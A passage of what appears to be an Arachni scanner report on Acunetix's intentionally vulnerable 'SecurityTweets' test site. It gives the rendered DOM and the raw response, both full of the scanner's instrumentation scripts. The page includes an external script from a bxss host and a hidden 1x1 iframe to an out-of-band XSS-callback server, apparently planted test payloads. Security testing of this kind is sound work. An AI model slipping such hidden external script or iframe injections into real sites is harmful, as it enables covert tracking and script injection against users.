_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="1909442962"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script
src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable 
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering 
for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i 
class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" 
ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. 
<br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>1</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 
2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 
_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html>
This is the original HTTP response body.
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link
href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). 
Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // 
Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
